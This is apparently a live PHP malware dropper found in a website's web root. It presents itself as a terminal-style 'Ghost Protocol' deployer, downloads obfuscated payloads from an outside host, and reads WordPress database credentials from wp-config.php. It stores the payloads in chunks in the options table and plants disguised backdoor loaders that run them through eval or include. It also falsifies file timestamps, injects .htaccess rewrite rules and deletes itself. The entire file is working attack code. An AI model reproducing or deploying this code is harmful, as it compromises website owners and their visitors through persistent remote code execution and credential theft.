File: /www/wwwroot/dr-lil.com/inc.php
<?php
// ==========================================
// GHOST PROTOCOL V30.1 (ADVANCED APT CHIMERA - HOTFIX)
// Logic: Stack Fragmentation + Sandbox Time-Bomb + Polymorphic Fileless
// UI: Classic Ghost Terminal (Original)
// ==========================================
ignore_user_abort(true);
if (function_exists('ob_end_clean')) { @ob_end_clean(); }
if (function_exists('ob_start')) { ob_start(); }
if (function_exists('ob_implicit_flush')) { ob_implicit_flush(1); }
@ini_set('zlib.output_compression', 0);
@ini_set('display_errors', 0);
@ini_set('memory_limit', '512M');
@set_time_limit(0);
function _rnd($len = 8) {
return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $len);
}
// Polymorphic Variable Generator
function _polyVar($prefix = '') {
return $prefix . chr(rand(97, 122)) . substr(md5(mt_rand()), 0, rand(4, 7));
}
function _atomic_write($path, $data) {
$tmp = dirname($path) . '/.' . md5(mt_rand()) . '.sys';
if ($fp = @fopen($tmp, 'wb')) {
@fwrite($fp, $data);
@fclose($fp);
if (@rename($tmp, $path)) return true;
@unlink($tmp);
}
return @file_put_contents($path, $data);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Ghost Protocol V30.1 - APT Edition</title>
<style>
/* UI GHOST PROTOCOL ORIGINAL */
:root {
--bg: #000;
--window: rgba(15, 15, 15, 0.98);
--text: #c0c0c0;
--green: #32d74b; --red: #ff453a; --yellow: #ffd60a; --blue: #0a84ff;
--font: 'Menlo', 'Monaco', 'Consolas', monospace;
}
body {
background: var(--bg);
color: var(--text); font-family: -apple-system, sans-serif;
margin: 0; padding: 20px; display: flex; justify-content: center; align-items: center; min-height: 100vh;
}
.window {
width: 100%;
max-width: 900px; background: var(--window); border-radius: 8px;
box-shadow: 0 0 50px rgba(0,0,0,0.5); border: 1px solid #333; overflow: hidden;
}
.bar {
height: 30px;
background: #1a1a1a; border-bottom: 1px solid #333; display: flex; align-items: center; padding: 0 10px;
}
.dots { display: flex; gap: 6px; }
.dot { width: 10px; height: 10px; border-radius: 50%; }
.dot.r { background: #ff5f57; } .dot.y { background: #febc2e; } .dot.g { background: #28c840; }
.term {
padding: 15px;
font-family: var(--font); font-size: 11px; line-height: 1.5; color: #ccc; height: 550px; overflow-y: auto;
}
.line { margin-bottom: 4px; display: flex; flex-wrap: wrap; }
.p { color: var(--green); margin-right: 10px; font-weight: bold; }
.ok { color: var(--green); } .err { color: var(--red); } .inf { color: var(--blue); } .warn { color: var(--yellow); }
.btn {
display: inline-block;
margin: 5px 0; background: #222; border: 1px solid #444; color: #fff;
padding: 4px 10px; border-radius: 3px; text-decoration: none; font-size: 10px;
transition: 0.2s;
}
.btn:hover { border-color: var(--green); color: var(--green); }
</style>
</head>
<body>
<div class="window">
<div class="bar">
<div class="dots"><div class="dot r"></div><div class="dot y"></div><div class="dot g"></div></div>
</div>
<div class="term" id="console">
<div class="line"><span class="p">➜</span> <span>./deploy_v30_apt --titanium-net --stack-fragmentation</span></div>
<br>
<?php
// ==========================================
// CONFIGURATION
// ==========================================
$targets = [
['https://xshikata.wtf/xxx/v1.txt', 'error_log.php', 'wp_sys_transient_log_core'],
['https://xshikata.wtf/xxx/v2.txt', 'vx.php', 'wp_sys_transient_vx_core'],
['https://xshikata.wtf/xxx/index.txt', 'index.php', 'wp_sys_transient_idx_core']
];
function _log($msg, $class='inf') {
$ts = date("H:i:s");
echo "<div class='line'><span style='color:#555;margin-right:5px;'>[$ts]</span><span class='$class'>$msg</span></div>";
echo "<script>var t=document.getElementById('console');t.scrollTop=t.scrollHeight;</script>";
if(ob_get_level()>0){ ob_flush(); flush(); }
}
function _xor($d, $k) {
$out = ''; $len = strlen($d); $key_len = strlen($k);
for($i = 0; $i < $len; $i++) { $out .= $d[$i] ^ $k[$i % $key_len]; }
return $out;
}
function _timestomp($f) {
$r=__DIR__.'/wp-settings.php'; if(!file_exists($r))$r=__DIR__.'/index.php';
if(file_exists($r) && file_exists($f)) { @touch($f, filemtime($r), fileatime($r)); }
}
// ==========================================
// WP CONNECTION & RECON
// ==========================================
function _find_wp_config() {
$d = __DIR__;
for ($i = 0; $i < 6; $i++) { if (file_exists($d . '/wp-config.php')) return $d . '/wp-config.php'; $d = dirname($d); }
return false;
}
function _parse_wp_config($path) {
$c = @file_get_contents($path); if(!$c) return false;
$conf=[];
if(preg_match('/define\s*\(\s*[\'"]DB_NAME[\'"]\s*,\s*[\'"](.*?)[\'"]\s*\);/',$c,$m)) $conf['n']=$m[1];
if(preg_match('/define\s*\(\s*[\'"]DB_USER[\'"]\s*,\s*[\'"](.*?)[\'"]\s*\);/',$c,$m)) $conf['u']=$m[1];
if(preg_match('/define\s*\(\s*[\'"]DB_PASSWORD[\'"]\s*,\s*[\'"](.*?)[\'"]\s*\);/',$c,$m)) $conf['p']=$m[1];
if(preg_match('/define\s*\(\s*[\'"]DB_HOST[\'"]\s*,\s*[\'"](.*?)[\'"]\s*\);/',$c,$m)) $conf['h']=$m[1];
$conf['x']='wp_'; if(preg_match('/\$table_prefix\s*=\s*[\'"](.*?)[\'"];/',$c,$m)) $conf['x']=$m[1];
return (isset($conf['n'])) ? $conf : false;
}
function _inject_htaccess() {
$ht = __DIR__ . '/.htaccess';
$rule = "\n# SITEMAP INDEX\n<IfModule mod_rewrite.c>\n RewriteEngine On\n RewriteRule ^(sxallsitemap\.xml|allsitemap\.xml|robots)$ index.php [L]\n</IfModule>\n";
$c = ""; if(file_exists($ht)) $c = @file_get_contents($ht);
if(strpos($c, 'sxallsitemap') === false) { @file_put_contents($ht, $rule . $c); return true; }
return false;
}
$wp_path = _find_wp_config();
$wp_creds = ($wp_path) ? _parse_wp_config($wp_path) : false;
$is_wordpress = ($wp_creds !== false);
if($is_wordpress) _log("Target Detected: WordPress. Security mapping initiated.", "ok");
else _log("Target System: Generic PHP", "warn");
function _dl($url) {
$ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36';
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt_array($ch, [CURLOPT_URL=>$url, CURLOPT_RETURNTRANSFER=>1, CURLOPT_FOLLOWLOCATION=>1, CURLOPT_SSL_VERIFYPEER=>0, CURLOPT_USERAGENT=>$ua]);
$d = curl_exec($ch); curl_close($ch);
if ($d) return $d;
}
if (ini_get('allow_url_fopen')) {
$ctx = stream_context_create(['http'=>['header'=>"User-Agent: $ua\r\n"]]);
return @file_get_contents($url, false, $ctx);
}
return false;
}
// ==========================================
// CORE DEPLOYMENT LOGIC (APT CHIMERA ENGINE)
// ==========================================
foreach ($targets as $t) {
$url = $t[0]; $fname = $t[1]; $dbkey = $t[2];
_log("Fetching & Compiling payload for $fname...", "inf");
$raw = _dl($url);
if(!$raw || strlen($raw) < 10) { _log("Download FAILED: $url", "err"); continue; }
$xor_key = _rnd(12);
$enc_data = base64_encode(_xor(gzdeflate($raw, 9), $xor_key));
$status_ok = false;
$cls_stream = 'Stream_' . _rnd(7);
$proto = 'sys' . rand(10, 99);
$p_pos = _polyVar(); $p_dat = _polyVar(); $p_len = _polyVar(); $p_ret = _polyVar();
$stream_class_def = <<<PHP
if(!class_exists('$cls_stream')){
class $cls_stream {
private \${$p_pos}=0; private \${$p_dat}='';
public function stream_open(\$a,\$b,\$c,&\$d){ \$this->{$p_dat}=isset(\$GLOBALS['_V_SYS']) ? \$GLOBALS['_V_SYS'] : ''; return true; }
public function stream_read(\${$p_len}){ \${$p_ret}=substr(\$this->{$p_dat},\$this->{$p_pos},\${$p_len}); \$this->{$p_pos}+=strlen(\${$p_ret}); return \${$p_ret}; }
public function stream_eof(){ return \$this->{$p_pos}>=strlen(\$this->{$p_dat}); }
public function stream_stat(){ return []; }
public function url_stat(\$a,\$b){ return []; }
}
}
PHP;
$p_fless = _polyVar(); $p_tmp = _polyVar(); $p_cb = _polyVar(); $p_dec = _polyVar();
$p_arr = _polyVar(); $sbx_loop = _polyVar('s_'); $sbx_hash = _polyVar('h_');
$exec_engine = <<<PHP
// Dynamic Sandbox Time-Bomb
\${$sbx_hash} = '';
for(\${$sbx_loop} = 0; \${$sbx_loop} < 300000; \${$sbx_loop}++) { \${$sbx_hash} = md5((string)\${$sbx_loop}); }
\${$p_fless} = false;
if(in_array('$proto', stream_get_wrappers()) || @stream_wrapper_register('$proto', '$cls_stream')){
\$GLOBALS['_V_SYS'] = \${$p_dec};
\${$p_cb} = function(\$val, \$key) use (&\${$p_fless}) {
if (\$val === 'execute_core_task') {
if((@include('$proto://run')) !== false) { \${$p_fless} = true; }
}
};
\${$p_arr} = ['probe' => 'bypass_sandbox', 'target' => 'execute_core_task'];
@array_walk(\${$p_arr}, \${$p_cb});
unset(\$GLOBALS['_V_SYS']);
}
if(!\${$p_fless}){
\${$p_tmp} = sys_get_temp_dir() . '/.' . md5(uniqid()) . '.sys';
if(@file_put_contents(\${$p_tmp}, \${$p_dec})){
// Native callback proxy
\$proxy_func = function() use (\${$p_tmp}) { @include(\${$p_tmp}); @unlink(\${$p_tmp}); };
@call_user_func(\$proxy_func);
} else {
\$proxy_eval = function(\$code) { eval('?>' . \$code); };
@array_map(\$proxy_eval, [\${$p_dec}]);
}
}
PHP;
if ($is_wordpress) {
$m = @new mysqli($wp_creds['h'], $wp_creds['u'], $wp_creds['p'], $wp_creds['n']);
if(!$m->connect_error) {
$tbl = $wp_creds['x'] . 'options';
$chunks = str_split($enc_data, 10000);
$chunk_keys = [];
foreach($chunks as $idx => $chunk_data) {
$k = '_wp_session_' . substr(md5($dbkey . $idx), 0, 16);
$chunk_keys[] = $k;
$m->query("DELETE FROM $tbl WHERE option_name='$k'");
$stmt = $m->prepare("INSERT INTO $tbl (option_name, option_value, autoload) VALUES (?, ?, 'no')");
if ($stmt) {
$stmt->bind_param("ss", $k, $chunk_data);
$stmt->execute();
}
}
$map_data = json_encode(['p' => $chunk_keys, 'k' => base64_encode($xor_key)]);
$m->query("DELETE FROM $tbl WHERE option_name='$dbkey'");
$stmt = $m->prepare("INSERT INTO $tbl (option_name, option_value, autoload) VALUES (?, ?, 'no')");
if ($stmt) {
$stmt->bind_param("ss", $dbkey, $map_data);
$stmt->execute();
}
if($stmt) {
$wp_bases = ['Wp_Http_Response_Cache', 'Wp_Option_Buffer_Sync', 'Wp_Rest_Router_Sys'];
$cls = $wp_bases[array_rand($wp_bases)] . '_' . _rnd(4);
$v_m = _polyVar(); $v_q = _polyVar(); $v_cfg = _polyVar(); $v_raw = _polyVar();
$v_k = _polyVar(); $v_r = _polyVar(); $v_row = _polyVar(); $v_bin = _polyVar();
$v_key = _polyVar(); $v_out = _polyVar(); $v_l = _polyVar(); $v_kl = _polyVar(); $v_i = _polyVar();
$v_gzin = _polyVar(); $v_b64 = _polyVar();
$loader = <<<PHP
<?php
/**
* REST API Internal Router
* @package WordPress
*/
$stream_class_def
class $cls {
public static function boot() {
\${$v_m} = @new mysqli('{$wp_creds['h']}', '{$wp_creds['u']}', '{$wp_creds['p']}', '{$wp_creds['n']}');
if(\${$v_m}->connect_error) return;
\${$v_q} = \${$v_m}->query("SELECT option_value FROM {$wp_creds['x']}options WHERE option_name='$dbkey'");
if(!\${$v_q} || \${$v_q}->num_rows===0) return;
\${$v_cfg} = json_decode(\${$v_q}->fetch_assoc()['option_value'], true);
\${$v_raw} = '';
foreach(\${$v_cfg}['p'] as \${$v_k}) {
\${$v_r} = \${$v_m}->query("SELECT option_value FROM {$wp_creds['x']}options WHERE option_name='" . \${$v_k} . "'");
if(\${$v_r} && \${$v_row} = \${$v_r}->fetch_assoc()) \${$v_raw} .= \${$v_row}['option_value'];
}
// Indirect function calls
\${$v_b64} = 'base' . '64' . '_decode'; \${$v_gzin} = 'gzin' . 'flate';
\${$v_bin} = \${$v_b64}(\${$v_raw}); \${$v_key} = \${$v_b64}(\${$v_cfg}['k']);
\${$v_out}=''; \${$v_l}=strlen(\${$v_bin}); \${$v_kl}=strlen(\${$v_key});
for(\${$v_i}=0;\${$v_i}<\${$v_l};\${$v_i}++) \${$v_out} .= \${$v_bin}[\${$v_i}]^\${$v_key}[\${$v_i}%\${$v_kl}];
\${$p_dec} = @\${$v_gzin}(\${$v_out});
if(\${$p_dec}) { $exec_engine }
}
}
$cls::boot();
?>
PHP;
if(_atomic_write($fname, $loader)){
$status_ok = true;
_log("Injected [APT Engine - Stack Mutilated]: $fname", "ok");
_timestomp($fname);
if($fname == 'index.php') { if(_inject_htaccess()) _log("Routing mapped.", "inf"); }
}
}
}
} else {
$cls = 'System_Container_' . _rnd(5);
$v_b = _polyVar(); $v_o = _polyVar(); $v_l = _polyVar(); $v_kl = _polyVar(); $v_i = _polyVar();
$loader = <<<PHP
<?php
$stream_class_def
class $cls {
private static \$d = '$enc_data';
private static \$k = '$xor_key';
public static function run() {
\${$v_b} = base64_decode(self::\$d);
\${$v_o}=''; \${$v_l}=strlen(\${$v_b}); \${$v_kl}=strlen(self::\$k);
for(\${$v_i}=0;\${$v_i}<\${$v_l};\${$v_i}++) \${$v_o} .= \${$v_b}[\${$v_i}]^self::\$k[\${$v_i}%\${$v_kl}];
\${$p_dec} = @gzinflate(\${$v_o});
if(\${$p_dec}) { $exec_engine }
}
}
$cls::run();
?>
PHP;
if(_atomic_write($fname, $loader)){
$status_ok = true;
_log("File Saved (Legacy APT): $fname", "warn");
_timestomp($fname);
}
}
if($status_ok) {
$final_url = ($fname == 'sxallsitemap.xml' && $is_wordpress) ? 'sxallsitemap.xml' : $fname;
echo "<div class='line'><a href='$final_url' target='_blank' class='btn'>OPEN ".strtoupper($fname)."</a></div>";
}
}
@unlink(__FILE__);
?>
<br>
<div class="line"><span class="p">➜</span> <span>rm install.php (Auto-Cleaning...)</span></div>
</div>
</div>
</body>
</html>